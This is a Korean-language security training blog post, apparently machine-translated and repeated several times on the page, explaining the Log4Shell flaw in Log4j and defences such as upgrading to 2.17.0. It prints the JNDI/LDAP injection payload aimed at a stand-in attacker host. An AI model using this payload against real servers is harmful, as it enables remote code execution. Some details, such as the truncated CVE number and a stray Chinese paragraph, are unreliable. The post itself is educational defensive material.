SCW 아이콘
영웅 배경, 구분선 없음
블로그

Log4j 취약점 상세 분석 - 공격 매개체 및 방어 방법

로라 베르헤이드
게시됨 Jan 16, 2022
마지막 업데이트: 2026년 3월 9일

12월 9일, 자바 라이브러리 Log4j에서 0일 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며,원격 코드 실행을 유발할 수 있어 '매우 심각(Critical)' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로, 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell 처리 능력을 빠르게 향상시키고 싶으신가요?

우리는 이미 데모 환경을 구축하여 Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점을 악용하는 경험을 제공해 드립니다. 이 미션에서는 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 안내해 드리겠습니다. 데모 환경으로 바로 이동하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보십시오.

옛날 뉴스?

이러한 취약점은 새로운 것이 아닙니다. 보안 연구원들은 2016년 BlackHat 발표에서 알바로 무니오스와 올렉산드르 미로슈가 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 쿼리를 실행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어지는지 설명했습니다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 주입 페이로드(injection payload)는 다음과 같습니다:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

다음은 JNDI, 즉 Java 네이밍 및 디렉터리 인터페이스입니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결해 데이터나 리소스를 검색할 수 있게 하는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버에 쿼리를 실행합니다. 예를 들어, 그 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 그 대가로 해당 파일은 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하고 "jndi" 접두사가 붙은 EL 구문으로 작성된 기록된 사용자 입력을 모두 쿼리하기 때문입니다. 유효한 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 주입될 수 있습니다. 또한 사용자 에이전트나 X-Forwarded-For와같은 HTTP 헤더 및 기타 헤더를 사용자 정의하여 페이로드를 전달할 수 있습니다.

직접 취약점을 체험하려면 , 저희 전시 구역으로 오셔서 2단계인 "영향력 체험"으로 넘어가세요.

예방: 인식

모든 애플리케이션에 대한 업그레이드를 권장합니다. Log4j는 취약한 코드를 지속적으로 패치하고 있기 때문입니다. 그러나 2.15.0 및 2.16.0 버전에는 DDoS 및 기타 취약점이 포함되어 있으므로, 12월 말부터는 2.17.0으로의 업그레이드를 권장합니다.

개발자가 코드를 작성할 때 우리는 항상 보안을 고려해야 합니다. Log4Shell은 제3자 프레임워크나 라이브러리를 사용할 때 위험이 따를 수 있음을 알려줍니다. 우리는 외부 자원을 사용하면 애플리케이션의 보안이 훼손될 수 있다는 사실을 인식해야 하며, 우리는 외부 자원이 안전하다고 순진하게 믿고 있습니다.

이 취약점은 예방할 수 있나요? 예와 아니오. 한편으로는 개발자가 제3자 소프트웨어를 통해 취약한 구성 요소를 도입해야만 더 많은 작업을 수행할 수 있습니다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되는 바, 즉 사용자의 입력을 절대 신뢰해서는 안 된다는 점입니다.

Secure Code Warrior는 보안 의식을 갖춘 개발자가 코드 취약점을 방지하는 최선의 방법이라고 생각합니다. SCW가 특정 프로그래밍 프레임워크에 대한 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용해 영향을 받는 자바 개발자가 누구인지 신속하게 파악할 수 있습니다. 또한 SCW 교육을 받은 보안 담당자를 통해 Log4j 업그레이드를 가속화하고 있습니다.

특히 Java 개발자를Secure Code Warrior Sensei무료 IntelliJ 플러그인을Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 가이드라인을 강제 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 규칙 레시피를활용할 수 있습니다. 레시피를살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피를 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 기술을 향상시키세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움을 드릴 수 있습니다. 데모 시작 시 해당 취약점을 간략히 살펴본 후, 안내에 따라 취약점을 직접 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


리소스 보기
리소스 보기

2021년 12월, Java 라이브러리 Log4j에서 심각한 보안 취약점인 Log4Shell이 공개되었습니다. 본 문서에서는 Log4Shell 취약점을 가장 단순한 형태로 분해하여 기초 지식을 습득할 수 있도록 돕고, 해당 취약점에 대한 이해를 바탕으로 모의 웹사이트를 공격해 볼 수 있는 실습 환경을 소개합니다.

더 많은 것에 관심이 있으신가요?

더 알아보세요

Secure Code Warrior는 조직이 소프트웨어 개발 생명주기 전반에 걸쳐 코드를 보호하고 사이버 보안을 최우선으로 하는 문화를 조성하도록 지원합니다. 앱 보안 관리자, 개발자, 최고정보보안책임자(CISO) 또는 보안 관련 업무를 수행하는 모든 분들에게, 저희는 조직이 안전하지 않은 코드와 관련된 위험을 줄일 수 있도록 돕습니다.

데모 예약
공유하기:
링크드인 브랜드사회적x 로고
저자
로라 베르헤이드
게시일: Jan 16, 2022

Laura Verheyde는 Secure Code Warrior 의 소프트웨어 개발자로서 취약점을 연구하고 Missions 및 코딩 연구소의 콘텐츠를 제작하는 데 주력하고 있습니다.

공유하기:
링크드인 브랜드사회적x 로고

12월 9일, 자바 라이브러리 Log4j에서 0일 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며,원격 코드 실행을 유발할 수 있어 '매우 심각(Critical)' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로, 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell 처리 능력을 빠르게 향상시키고 싶으신가요?

우리는 이미 데모 환경을 구축하여 Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점을 악용하는 경험을 제공해 드립니다. 이 미션에서는 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 안내해 드리겠습니다. 데모 환경으로 바로 이동하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보십시오.

옛날 뉴스?

이러한 취약점은 새로운 것이 아닙니다. 보안 연구원들은 2016년 BlackHat 발표에서 알바로 무니오스와 올렉산드르 미로슈가 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 쿼리를 실행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어지는지 설명했습니다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 주입 페이로드(injection payload)는 다음과 같습니다:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

다음은 JNDI, 즉 Java 네이밍 및 디렉터리 인터페이스입니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결해 데이터나 리소스를 검색할 수 있게 하는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버에 쿼리를 실행합니다. 예를 들어, 그 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 그 대가로 해당 파일은 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하고 "jndi" 접두사가 붙은 EL 구문으로 작성된 기록된 사용자 입력을 모두 쿼리하기 때문입니다. 유효한 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 주입될 수 있습니다. 또한 사용자 에이전트나 X-Forwarded-For와같은 HTTP 헤더 및 기타 헤더를 사용자 정의하여 페이로드를 전달할 수 있습니다.

직접 취약점을 체험하려면 , 저희 전시 구역으로 오셔서 2단계인 "영향력 체험"으로 넘어가세요.

예방: 인식

모든 애플리케이션에 대한 업그레이드를 권장합니다. Log4j는 취약한 코드를 지속적으로 패치하고 있기 때문입니다. 그러나 2.15.0 및 2.16.0 버전에는 DDoS 및 기타 취약점이 포함되어 있으므로, 12월 말부터는 2.17.0으로의 업그레이드를 권장합니다.

개발자가 코드를 작성할 때 우리는 항상 보안을 고려해야 합니다. Log4Shell은 제3자 프레임워크나 라이브러리를 사용할 때 위험이 따를 수 있음을 알려줍니다. 우리는 외부 자원을 사용하면 애플리케이션의 보안이 훼손될 수 있다는 사실을 인식해야 하며, 우리는 외부 자원이 안전하다고 순진하게 믿고 있습니다.

이 취약점은 예방할 수 있나요? 예와 아니오. 한편으로는 개발자가 제3자 소프트웨어를 통해 취약한 구성 요소를 도입해야만 더 많은 작업을 수행할 수 있습니다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되는 바, 즉 사용자의 입력을 절대 신뢰해서는 안 된다는 점입니다.

Secure Code Warrior는 보안 의식을 갖춘 개발자가 코드 취약점을 방지하는 최선의 방법이라고 생각합니다. SCW가 특정 프로그래밍 프레임워크에 대한 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용해 영향을 받는 자바 개발자가 누구인지 신속하게 파악할 수 있습니다. 또한 SCW 교육을 받은 보안 담당자를 통해 Log4j 업그레이드를 가속화하고 있습니다.

특히 Java 개발자를Secure Code Warrior Sensei무료 IntelliJ 플러그인을Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 가이드라인을 강제 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 규칙 레시피를활용할 수 있습니다. 레시피를살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피를 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 기술을 향상시키세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움을 드릴 수 있습니다. 데모 시작 시 해당 취약점을 간략히 살펴본 후, 안내에 따라 취약점을 직접 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


리소스 보기
리소스 보기

아래 양식을 작성하여 보고서를 다운로드하세요

귀하의 허락을 받아 저희 제품 및/또는 관련 보안 코딩 주제에 관한 정보를 보내드리고자 합니다. 귀하의 개인정보는 항상 매우 신중하게 취급되며, 마케팅 목적으로 타사에 판매하지 않을 것을 약속드립니다.

제출
scw 성공 아이콘
scw 오류 아이콘
양식을 제출하려면 "분석" 쿠키를 활성화하십시오. 완료 후에는 원할 때 다시 비활성화할 수 있습니다.

12월 9일, 자바 라이브러리 Log4j에서 0일 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며,원격 코드 실행을 유발할 수 있어 '매우 심각(Critical)' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로, 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell 처리 능력을 빠르게 향상시키고 싶으신가요?

우리는 이미 데모 환경을 구축하여 Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점을 악용하는 경험을 제공해 드립니다. 이 미션에서는 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 안내해 드리겠습니다. 데모 환경으로 바로 이동하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보십시오.

옛날 뉴스?

이러한 취약점은 새로운 것이 아닙니다. 보안 연구원들은 2016년 BlackHat 발표에서 알바로 무니오스와 올렉산드르 미로슈가 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 쿼리를 실행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어지는지 설명했습니다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 주입 페이로드(injection payload)는 다음과 같습니다:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

다음은 JNDI, 즉 Java 네이밍 및 디렉터리 인터페이스입니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결해 데이터나 리소스를 검색할 수 있게 하는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버에 쿼리를 실행합니다. 예를 들어, 그 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 그 대가로 해당 파일은 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하고 "jndi" 접두사가 붙은 EL 구문으로 작성된 기록된 사용자 입력을 모두 쿼리하기 때문입니다. 유효한 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 주입될 수 있습니다. 또한 사용자 에이전트나 X-Forwarded-For와같은 HTTP 헤더 및 기타 헤더를 사용자 정의하여 페이로드를 전달할 수 있습니다.

직접 취약점을 체험하려면 , 저희 전시 구역으로 오셔서 2단계인 "영향력 체험"으로 넘어가세요.

예방: 인식

모든 애플리케이션에 대한 업그레이드를 권장합니다. Log4j는 취약한 코드를 지속적으로 패치하고 있기 때문입니다. 그러나 2.15.0 및 2.16.0 버전에는 DDoS 및 기타 취약점이 포함되어 있으므로, 12월 말부터는 2.17.0으로의 업그레이드를 권장합니다.

개발자가 코드를 작성할 때 우리는 항상 보안을 고려해야 합니다. Log4Shell은 제3자 프레임워크나 라이브러리를 사용할 때 위험이 따를 수 있음을 알려줍니다. 우리는 외부 자원을 사용하면 애플리케이션의 보안이 훼손될 수 있다는 사실을 인식해야 하며, 우리는 외부 자원이 안전하다고 순진하게 믿고 있습니다.

이 취약점은 예방할 수 있나요? 예와 아니오. 한편으로는 개발자가 제3자 소프트웨어를 통해 취약한 구성 요소를 도입해야만 더 많은 작업을 수행할 수 있습니다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되는 바, 즉 사용자의 입력을 절대 신뢰해서는 안 된다는 점입니다.

Secure Code Warrior는 보안 의식을 갖춘 개발자가 코드 취약점을 방지하는 최선의 방법이라고 생각합니다. SCW가 특정 프로그래밍 프레임워크에 대한 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용해 영향을 받는 자바 개발자가 누구인지 신속하게 파악할 수 있습니다. 또한 SCW 교육을 받은 보안 담당자를 통해 Log4j 업그레이드를 가속화하고 있습니다.

특히 Java 개발자를Secure Code Warrior Sensei무료 IntelliJ 플러그인을Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 가이드라인을 강제 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 규칙 레시피를활용할 수 있습니다. 레시피를살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피를 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 기술을 향상시키세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움을 드릴 수 있습니다. 데모 시작 시 해당 취약점을 간략히 살펴본 후, 안내에 따라 취약점을 직접 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


웹 세미나 시청
시작하자
더 알아보세요

아래 링크를 클릭하고 이 자료의 PDF를 다운로드하세요.

Secure Code Warrior는 조직이 소프트웨어 개발 생명주기 전반에 걸쳐 코드를 보호하고 사이버 보안을 최우선으로 하는 문화를 조성하도록 지원합니다. 앱 보안 관리자, 개발자, 최고정보보안책임자(CISO) 또는 보안 관련 업무를 수행하는 모든 분들에게, 저희는 조직이 안전하지 않은 코드와 관련된 위험을 줄일 수 있도록 돕습니다.

보고서 보기데모 예약
리소스 보기
공유하기:
링크드인 브랜드사회적x 로고
더 많은 것에 관심이 있으신가요?

공유하기:
링크드인 브랜드사회적x 로고
저자
로라 베르헤이드
게시일: Jan 16, 2022

Laura Verheyde는 Secure Code Warrior 의 소프트웨어 개발자로서 취약점을 연구하고 Missions 및 코딩 연구소의 콘텐츠를 제작하는 데 주력하고 있습니다.

공유하기:
링크드인 브랜드사회적x 로고

12월 9일, 자바 라이브러리 Log4j에서 0일 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며,원격 코드 실행을 유발할 수 있어 '매우 심각(Critical)' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로, 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell 처리 능력을 빠르게 향상시키고 싶으신가요?

우리는 이미 데모 환경을 구축하여 Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점을 악용하는 경험을 제공해 드립니다. 이 미션에서는 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 안내해 드리겠습니다. 데모 환경으로 바로 이동하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보십시오.

옛날 뉴스?

이러한 취약점은 새로운 것이 아닙니다. 보안 연구원들은 2016년 BlackHat 발표에서 알바로 무니오스와 올렉산드르 미로슈가 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 쿼리를 실행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어지는지 설명했습니다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 주입 페이로드(injection payload)는 다음과 같습니다:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

다음은 JNDI, 즉 Java 네이밍 및 디렉터리 인터페이스입니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결해 데이터나 리소스를 검색할 수 있게 하는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버에 쿼리를 실행합니다. 예를 들어, 그 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 그 대가로 해당 파일은 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하고 "jndi" 접두사가 붙은 EL 구문으로 작성된 기록된 사용자 입력을 모두 쿼리하기 때문입니다. 유효한 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 주입될 수 있습니다. 또한 사용자 에이전트나 X-Forwarded-For와같은 HTTP 헤더 및 기타 헤더를 사용자 정의하여 페이로드를 전달할 수 있습니다.

직접 취약점을 체험하려면 , 저희 전시 구역으로 오셔서 2단계인 "영향력 체험"으로 넘어가세요.

예방: 인식

모든 애플리케이션에 대한 업그레이드를 권장합니다. Log4j는 취약한 코드를 지속적으로 패치하고 있기 때문입니다. 그러나 2.15.0 및 2.16.0 버전에는 DDoS 및 기타 취약점이 포함되어 있으므로, 12월 말부터는 2.17.0으로의 업그레이드를 권장합니다.

개발자가 코드를 작성할 때 우리는 항상 보안을 고려해야 합니다. Log4Shell은 제3자 프레임워크나 라이브러리를 사용할 때 위험이 따를 수 있음을 알려줍니다. 우리는 외부 자원을 사용하면 애플리케이션의 보안이 훼손될 수 있다는 사실을 인식해야 하며, 우리는 외부 자원이 안전하다고 순진하게 믿고 있습니다.

이 취약점은 예방할 수 있나요? 예와 아니오. 한편으로는 개발자가 제3자 소프트웨어를 통해 취약한 구성 요소를 도입해야만 더 많은 작업을 수행할 수 있습니다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되는 바, 즉 사용자의 입력을 절대 신뢰해서는 안 된다는 점입니다.

Secure Code Warrior는 보안 의식을 갖춘 개발자가 코드 취약점을 방지하는 최선의 방법이라고 생각합니다. SCW가 특정 프로그래밍 프레임워크에 대한 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용해 영향을 받는 자바 개발자가 누구인지 신속하게 파악할 수 있습니다. 또한 SCW 교육을 받은 보안 담당자를 통해 Log4j 업그레이드를 가속화하고 있습니다.

특히 Java 개발자를Secure Code Warrior Sensei무료 IntelliJ 플러그인을Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 가이드라인을 강제 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 규칙 레시피를활용할 수 있습니다. 레시피를살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피를 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 기술을 향상시키세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움을 드릴 수 있습니다. 데모 시작 시 해당 취약점을 간략히 살펴본 후, 안내에 따라 취약점을 직접 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


목록

PDF 다운로드
리소스 보기
더 많은 것에 관심이 있으신가요?

더 알아보세요

Secure Code Warrior는 조직이 소프트웨어 개발 생명주기 전반에 걸쳐 코드를 보호하고 사이버 보안을 최우선으로 하는 문화를 조성하도록 지원합니다. 앱 보안 관리자, 개발자, 최고정보보안책임자(CISO) 또는 보안 관련 업무를 수행하는 모든 분들에게, 저희는 조직이 안전하지 않은 코드와 관련된 위험을 줄일 수 있도록 돕습니다.

데모 예약다운로드
공유하기:
링크드인 브랜드사회적x 로고
자원 센터

시작하는 데 도움이 되는 자료

더 많은 게시물
자원 센터

시작하는 데 도움이 되는 자료

더 많은 게시물